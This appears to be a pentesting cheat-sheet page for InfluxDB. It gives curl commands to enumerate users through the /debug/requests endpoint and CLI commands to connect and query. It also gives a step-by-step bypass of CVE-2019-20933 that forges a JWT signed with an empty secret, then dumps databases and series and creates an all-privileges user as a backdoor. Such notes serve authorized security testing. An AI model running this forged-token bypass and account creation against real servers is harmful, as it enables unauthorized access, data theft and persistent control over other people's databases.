InfluxDB Pentesting

InfluxDB is a time series database written in Go. A default port is 8086.

Enumeration

# User enumeration
curl http://<target-ip>:8086/debug/requests

Connect


influx -host 10.0.0.1 -port 8086
influx -host 10.0.0.1 -port 8086 -database <database>
influx -host 10.0.0.1 -port 8086 -username <username>  -password <password>

# Import db file
influx -path example.db

Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6

Automation

Manual

Firse find the username.

curl http://<target-ip>:8086/debug/requests

Header:
    
{ “sub”: “123456789”, "alg": "HS256", "typ": "JWT" }
    
Payload:
    
{ "username": "**<username>**",  "exp":21548669066 }
    
Verify Signature:
    
HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),<e**mpty>**)

Copy the generated JWT. Now we can query the InfluxDB API.

INFLUXDB_JWT="<JWT>"
# List databases
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq
# List seriest in the database
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq
# Get values in the series
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq

# Create a privileged account
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"

Commands

# Show command history
> history
# Show settings
> settings

# List databases
> show databases
# Show series information
> show series
# Show measurement information
> show measurements
# Show tag key information
> show tag keys
# Show field key information
> show field keys

# Switch to the database
> use <database>
# Query in the database
> select * from <series>

PreviousCouchDB Pentesting NextMSSQL (Microsoft SQL) Pentesting

Last updated 1 year ago